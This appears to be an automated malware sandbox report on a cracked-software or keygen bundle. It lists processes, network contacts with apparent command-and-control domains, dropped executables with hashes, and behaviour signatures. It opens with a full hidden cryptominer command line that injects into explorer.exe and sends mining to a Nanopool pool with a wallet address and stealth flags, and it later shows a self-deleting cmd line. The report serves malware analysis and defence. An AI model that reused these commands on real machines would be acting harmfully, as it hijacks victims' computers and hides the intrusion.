C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4612 -ip 4612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 1148

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 remotenetwork.xyz udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 startupmart.bar udp
RU 186.2.171.3:80 186.2.171.3 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 best-supply-link.xyz udp
US 8.8.8.8:53 2no.co udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
RU 186.2.171.3:443 186.2.171.3 tcp
US 172.67.149.76:443 2no.co tcp
US 172.67.149.76:443 2no.co tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 3.171.2.186.in-addr.arpa udp
US 8.8.8.8:53 76.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 cleaner-partners.biz udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 one-online-gam3s.com udp
US 8.8.8.8:53 oneeuropegroup.xyz udp
US 8.8.8.8:53 gensolutions.bar udp
US 8.8.8.8:53 2no.co udp
US 104.21.79.229:443 2no.co tcp
SG 37.0.10.214:80 tcp
US 8.8.8.8:53 229.79.21.104.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
SG 37.0.10.244:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
FR 163.172.171.111:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 54.37.232.103:14433 xmr-eu1.nanopool.org tcp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 111.171.172.163.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 103.232.37.54.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
MX 31.210.20.251:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 live.goatgame.live udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
UA 194.145.227.161:80 tcp
US 8.8.8.8:53 qwertys.info udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 qwertys.info udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

MD5 7126148bfe5ca4bf7e098d794122a9a3
SHA1 3fe6be3ee8bf1a0c99139b146913c8c6acd7dd64
SHA256 f8c0350d71e5dd14438d477f73915c4845290c7f0620656624722183b76013f5
SHA512 0bec6450d1be17489436de7a5186dbcb88089edd4227c3b5484460c9368e5ca0a2d88c385d31989f449a5d8cc347057c80a997682d6c0ed1b9cfcb85c677eb48

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

MD5 8902f8193024fa4187ca1aad97675960
SHA1 37a4840c9657205544790c437698b54ca33bfd9d
SHA256 95de484851569f225488320d573e398ebc2312b2d85b6c2b255b63b21aebb82f
SHA512 c351204604cb24c45ddb26847a22f5487a2942ad2b2361dbd31ce0a308c281be91658907d7fe04b483f053b7f9b0c680cae11361709ba7552f7921e727241938

memory/3944-33-0x00000000727CE000-0x00000000727CF000-memory.dmp

memory/3944-34-0x0000000000DF0000-0x0000000000FC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

MD5 4b0d49f7c8712d7a0d44306309f2e962
SHA1 5f0a2536f215babccf860c7ccdeaf7055bb59cad
SHA256 f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60
SHA512 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

MD5 13e802bd360e44591d7d23036ce1fd33
SHA1 091a58503734848a4716382862526859299ef345
SHA256 e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b
SHA512 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b

memory/1772-57-0x00000000004B0000-0x00000000004C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 a5bace3c3c2fa1cb766775746a046594
SHA1 9998cad5ba39e0be94347fcd2a2affd0c0a25930
SHA256 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6
SHA512 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184

memory/636-61-0x0000000000690000-0x00000000006B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 0ebb4afbb726f3ca17896a0274b78290
SHA1 b543a593cfa0cc84b6af0457ccdc27c1b42ea622
SHA256 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2
SHA512 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11

memory/3872-73-0x00000000001D0000-0x00000000001D8000-memory.dmp

memory/636-79-0x0000000000E40000-0x0000000000E5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

MD5 f9be28007149d38c6ccb7a7ab1fcf7e5
SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

MD5 f250a9c692088cce4253332a205b1649
SHA1 109c79124ce2bda06cab50ea5d97294d13d42b20
SHA256 0a6c3a23510f93fcdcb6d5acc53ccccbcc51c68f14b1bcbd758ffbf135f8e882
SHA512 80553664f188ae35cef1f89d188fb17df8a490367f8d6fa5f9897115bacf776373905bccd599353add684c7fa6c2554d04cbf1a7f6cc87b299d6c51da33c1b5e

memory/3128-96-0x0000000000400000-0x0000000000667000-memory.dmp

memory/3128-103-0x0000000000400000-0x0000000000667000-memory.dmp

memory/4612-102-0x0000000000400000-0x0000000002B59000-memory.dmp

memory/1772-109-0x00000000013B0000-0x00000000013C2000-memory.dmp

memory/1772-108-0x0000000000E50000-0x0000000000E5E000-memory.dmp

memory/3128-118-0x0000000003BF0000-0x0000000003C00000-memory.dmp

memory/3128-112-0x0000000003A90000-0x0000000003AA0000-memory.dmp

memory/3128-125-0x00000000046A0000-0x00000000046A8000-memory.dmp

memory/3128-126-0x00000000046C0000-0x00000000046C8000-memory.dmp

memory/3128-128-0x0000000004780000-0x0000000004788000-memory.dmp

memory/3128-131-0x0000000004740000-0x0000000004748000-memory.dmp

memory/3128-132-0x00000000048C0000-0x00000000048C8000-memory.dmp

memory/3128-133-0x0000000004B70000-0x0000000004B78000-memory.dmp

memory/3128-134-0x0000000004A70000-0x0000000004A78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 131af893fdda3509c156ba94660781b3
SHA1 3f466bc9954868a5a0b5d9cb075b833f994cb559
SHA256 239b4cbdfe71aa3819e1eee267f89e1a93abeb095e50b34c3ce506f636f9dd7e
SHA512 1f9f37bf2044d48b5b7402b456e78473d7c6d83be5825a25db4390437a520763d59c62500d70686992a17f5a2373364c77e46ec78914e1f521a17344813adf1e

memory/3128-148-0x00000000046C0000-0x00000000046C8000-memory.dmp

memory/3128-135-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d7e880e586b9dd277964d93c3f6f884b
SHA1 ee406a37e18b02c0502a9e086d1bc72b088e6da3
SHA256 a1ef8ebc74ddc325e7c58c0fb9fc50d8001d99ab3fb7d1fdefff158571cbfcda
SHA512 3c60fbfebe83debe65ad491b6ddc7464f0cd7e2dbb2ccc1b24b583f53d864fc1ad4a2823488f45ddbd0337028b5a677fa0466bd6bf239ecbb8b9503f995a1d4d

memory/3128-156-0x00000000048E0000-0x00000000048E8000-memory.dmp

memory/3128-179-0x0000000004A10000-0x0000000004A18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 0397f70c5c68aaebb3f53b37dcd26e3a
SHA1 b9b8c300ea402333b2c502c31f9a9d3f19949c43
SHA256 ca9899fcf8b04a34a9def2f9470260911b8fed40256988b1c02125bb2c5a2555
SHA512 d3d62b58cdeeddec2f7ffbb030a4dc24dace785e7a4b74c9ce5d2fc2a3b40b62b593f0f21c3033ef627154ff3e73692ffadd88bf373f0e5799c997b851c4779b

memory/3128-158-0x0000000004A10000-0x0000000004A18000-memory.dmp

memory/3128-171-0x00000000046C0000-0x00000000046C8000-memory.dmp

memory/3128-181-0x00000000048E0000-0x00000000048E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7a21ab9db1f50f54d69938d418ff2a6a
SHA1 e3415b651b56f5a43bfe719b5bb95d87611d099d
SHA256 5b710dd3610fbcf03d51e4b826e3ee929f0551f23a8b608312679b64488393ed
SHA512 a8436eba37fc4cee57c29aedb75b5f89a8aee2f1fa51779183e7cddc50624ac4dcf1ae705b130c9877731c4ffcba6afa4878a8b6660d27ff72ca661c18cfc071

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d

MD5 96de5522298c8e7f7298caae5c7fa1d4
SHA1 0ae8a20d88d64852d1e609b67e182c3f92a87dde
SHA256 ce43d22061873efd109e129caf60dc93cdc71c42413994f732178248fdd57ee3
SHA512 4a561ab340713dea2db37943ed94d96bab774444bd4f5de84bafbf9e76cf51547403aba8c0f401dc8b8f9c1a02361cf889b2378a21fb5bf242877965de314858

memory/3128-220-0x0000000004580000-0x0000000004588000-memory.dmp

memory/3128-221-0x00000000045A0000-0x00000000045A8000-memory.dmp

memory/3128-229-0x0000000004640000-0x0000000004648000-memory.dmp

memory/3128-233-0x0000000004DC0000-0x0000000004DC8000-memory.dmp

memory/3128-232-0x0000000004640000-0x0000000004648000-memory.dmp

memory/3128-234-0x0000000005070000-0x0000000005078000-memory.dmp

memory/3128-235-0x0000000004F70000-0x0000000004F78000-memory.dmp

memory/3128-236-0x0000000004DD0000-0x0000000004DD8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 7eddb5441f9e3374e4c09e4f9eaec5db
SHA1 e32740697dd2649f72ed4344de1aa4c4611304a3
SHA256 30f7e45c78e5d357306683a5b7b4c3ec9490f2e9c4e8a01d0e52f82daffd6f48
SHA512 0390af46dbc700800045f5c646012616d3063854c8e7c4e2d6d35781a2a60afa08902112734bd1381eb88e83d6578e1b5ffcb641a141c26d42a22d1c6b535881

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 09fd93e3d75dabb0ecfe41a3f97ecd87
SHA1 309493cbe8ae60899cb71a23ba023c0f3ef1368d
SHA256 b8de801b681d04bae5fccb9d45e7e4d634aed8e6b88ba3e61ffd8382a3727af3
SHA512 6311d78fac1918664907694672a32420fd64fe02f730f30a6822bb0269f8847973abd5ae1f4cd2b2dd336935e154dfdd7ee16935f203ae3f2384574fd97bf954

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 1208b1144c765c5da9627174ecc30601
SHA1 1e753f7da36ed81f7895f4de36c9add65dc466f8
SHA256 f32f3530a103c4a7c9245851aaf0fb5125951c8803ae4b329b33ddffd62b32d3
SHA512 6bfcbef84beaced842e67e119b00dc4b2b5aea939d7b0fdd2688a57a09e3523e83e1b225b4980b5b19656f344e4680aa9274626556bc916e5aba394d6151a47e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 6b5b1c58f266f850745cdf074dfba679
SHA1 48c3dc5d762456e50ae8e7c6d7ca692a2e448af8
SHA256 49ffbac4bf8b5565f4be0d66ba142ff156575d2de3570aa7b4820e4e264e0a2d
SHA512 4e41de7249803fae6d861ede30c6c0ca38f9f90e90fc52c40cef4a9ca199cbb913a25f2c89717142210dbd671ed14bd312772d6967be31591eefb1a5c10f5dd5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 1bdad89e14c502647802c7f397b1c445
SHA1 5a28fb09a469509f7cac6c7c4d6f10aeabb1c940
SHA256 7d0daa32d20ffebe431f9760bd079f749117d662272857a1c2b93674b442a42f
SHA512 ea27ba8f4c5394e0fbd2725556b1cc332787c4ed1136ba2cd8381b5858d2fe12c696bc20546f9bf5371c14a941721950d46a1c50210ad7c6391f9d7318e6140e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d4a3285968ecab86d9bdaeddad0f25a2
SHA1 a1d8542429d3f276d4fb0ad5619d09613d9d87b2
SHA256 0461cc6edb9444b1532ae97f8f2c08e08f24816d0da7c318eaa8dc92d1a04a78
SHA512 30f76d9e4d2cf9dc49d8865d0b0cb733cc9d78cff6957125d959487db82acc7d33e303435def46f1c014a6011071c732540e6ae20b35b30df0d002277d391043

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 cacce1ae356771810ccaf23e3f2b5b9d
SHA1 8e6baa63dea4a3b9a5f066479e642a6fbce5d1e8
SHA256 fcd4be44fb83a976735acfab85804138653f0a2b70ebbfa5371abaac9be6f87c
SHA512 328747137b57c323cb8243fa52afa1fb00ef1d9253a7fd7031958805985182f36321e1d991891d24c5eed776dfa59adcfb6a7150974a66a9980f6eab27ae7113

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 704417ba46c5a508ba6181bffe798641
SHA1 055c1d9c2257d65e4a2f9161a6befcdb75470f88
SHA256 d811eccb0bb036f76263f239c6ed4f9e613480c544b7130285afd8a5b5389463
SHA512 f020745e684828cafdba8d68d37fa62e8d18079554baaa2aa5e7af1a9d5942bb3c2ff8b9f924b07e70724a1da608cfb6c9ea0fb991188710e2b7dc85dd2f499d

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d86f9199cb5093b8867e1db3fb965f2c
SHA1 a96c1d7497f9a9cb9934a6ad1e77984355035747
SHA256 cd847288ff5f268c94ac844472cffadafa8285b77b63a21bece93a2c8bb41468
SHA512 e134365cd96eb63e578a637c3536fe9e2edb495d44c84ff5ea3a78a6847914a0eb70f226a743aee17a6defa93cfae98fb0155317a560211d3d0e62c46bd52f4f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 19fbf9968f26f8785d2579d857cdbc6b
SHA1 3f5577adc6a4257af5ca5ec2afdb95191191d06d
SHA256 87dd8ddb32ce855391fb14cda5038cab71e799ec3fa1bbf13edc4e347e9c3453
SHA512 1e033d583f4dfbb2fdc2676ab43ee1a8bc23fac54f3bddc01774c02f5ee2e6086744c0a144bf902d479f0b3fb5b8a6dc219ae9d044c9a8fbe34d1212e7ea80e2

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 3f9892b86e97f6f6672da2aae4f6c2b1
SHA1 e3cbfa966258bb0b7876e22159a84c1779f5bf7d
SHA256 68ea36d2e4a7b07686cb3d5c87df65a0a17619de891d8cf090ee687aabd23b3d
SHA512 f8c82413ab69963d9bddc529bea148290313b5ae7c04dfc62521ea15ab0f62794727793b5d750fc6ac23a9bf965f55b4b2edf0725f32a0500e8ec0eddbe83210

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 d8ee8db93a888442a013d2964b936548
SHA1 e6dc9c66aede826aa0fa6d92709c062844a10c8f
SHA256 e27d79774a1ad3f3680d074a98f769744a08563da6257ae113fa3924b8565eb1
SHA512 4c7261d4fd37ad0cb27ce1adc5b7dee0064bc31aa3fefd7ee212f442d9c80445b318f07aa0d7fbcc2b47dfaa37faaa3e27ba02b4df8ea2f80922a29d1751d0df

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 90f342fe9ffbf819e607282a603a7d43
SHA1 bf774edfa7d522772bc5db337e5c2d67f34f2e1d
SHA256 42f2e65c356567d709c6bddcbc768709eeb4612a91c78efc919a79d370126224
SHA512 91dcebc9c4b288d50f815578de95a56af7038fd655390fa19d30dd416901da770e22dfe2bae112bb5c9093ca3b683ae564e3c5b2d227dc5217fc914aaeff7d20

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 4a38907630302671c72ee92d0779f2ab
SHA1 b8cbd7f41137b5540134bd4566b31cae7fa84e08
SHA256 24d2eeeb382dff1c4fd23bbf726674cbc89bbb1d0f5da5a6f5392151f8218cff
SHA512 cc4c161d6a127dffa28957d9850a6f8bc3e3621257e11d0c8219d93c951ed873e291f7978e2cfd1c4636015f37ecec9cd0856448427929b550ad9b355f70838f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 6de20428cd5a450e33d42acc597946d8
SHA1 ccdea1bc0f0b2ff01ed92a27cc3d603631ca420c
SHA256 ce4dabf29b75ff731ed9db5962f838818b7c23cf2efe34e4c39d5b1933868612
SHA512 56110393e9d1f43651cecac4a0d1bdb690c777f5d2389afff1cbcaac3c8831044c9e7880456e66c53e960b19e089dc30f55f1e16c9745a83ed79f58051db1450

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.INTEG.RAW

MD5 0489b6e31348e1ead95f955bc05139ea
SHA1 108d147c84ad6bd223da450f571480705aeda47f
SHA256 a9dc26c0cb9ea7a42d34714b8773b3e33d84d966a88481fdd2e73470ee788d88
SHA512 733161815ed7a2da02319202a5b7b696a976cadfdc066b0226f094eb3fcac66ce1165ac140d754df94ade849dde820f46c5f1ac1d9de8c71f186a1b26a669938

C:\Users\Admin\AppData\Local\Temp\RarSFX0\d.jfm

MD5 5771ea8d5dd037a746905e9ecfc9d24f
SHA1 2255bbe04da92a81a4cbb62dc4d83d8d59a3f4fc
SHA256 841291763cdb3d6fc45928396d5d89688b8da744b8e69e01cbdd33476ccd674a
SHA512 2dd766486b8d8a475cc88215634b560359b8e1e2bafd3d5124bfc1edf3514012126ed55602d4b57d817be730b0a25361921e055e2d2dfcf768215d329dd00032

memory/3128-622-0x0000000000400000-0x0000000000667000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe

MD5 0388a1ce1bb8c076387b69ffcb3b40ec
SHA1 3ec08a53ec024d9be6346440848c37d0e0d7bb80
SHA256 448febc4311881856de2c237285907fe9470818e169946b0dbf1362f332e070a
SHA512 ea5af764d0373c8b9a5faf6d7094c76c9c321e227713bceecd49df50fa888e8fd04b1dfe16c4b75a8727717582b06383825e5d4317db1b875951ee240edd71d5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe

MD5 9a6071c1a67be3fb247f857fe5903bbf
SHA1 4a2e14763c51537e8695014007eceaf391a3f600
SHA256 01a9cb71df1d038bbec243ec7f2c1dd12d65a735297469c7f72be80886842e3c
SHA512 c862ed8670b48e23b081e1c91280599ffdd963e714665b80553b41540cb3584c823a25f05c75e47eaea1473c687a9ef7c9a219d724d059e5bd77ac6d127f5e68

memory/3256-642-0x0000000000FE0000-0x0000000000FFE000-memory.dmp

memory/3256-643-0x0000000002F40000-0x0000000002F5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 7009fb80a52366b6c2cd8ec052a65791
SHA1 db0894463edf3ac11e5ca4b4584e8f10d75810f6
SHA256 767c546decf6f669263e4a0a87a0f5d92234e031e9a0de3733fa954a8f3e0255
SHA512 26e50e4b3d0b5fe866423b9ae0c02f61882f632fe4a16c05da117c02fae9aea26a6c81458e4b0bc2bda8acd0407565132f8bd6b7d3e828dd90fc280b1f15f079

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 9910203407b2605107587e954081c575
SHA1 8037bfb3b779fbbb3273df4f5c63d15b9589ce95
SHA256 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49
SHA512 ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be

memory/1772-672-0x00000000006B0000-0x00000000006B6000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
